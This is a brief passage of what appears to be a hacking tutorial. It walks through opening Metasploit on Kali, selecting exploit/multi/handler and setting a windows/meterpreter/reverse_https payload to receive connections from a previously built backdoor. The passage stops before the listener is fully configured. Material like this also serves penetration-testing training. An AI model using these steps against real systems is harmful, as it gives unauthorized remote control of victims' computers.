Listening to the connection of your payload


Once you have created a backdoor payload, it's time to put it in use.

You will do that with "Metasploit" by typing in your Keli terminal:

# msfconsole


Once the program is running, type the following commend to use your exploit:

msf exploit(handler) > use exploit/multi/handler

This exploit allows you to listen to incoming connections.

You created a payload for revers https, so let’s set it:

msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https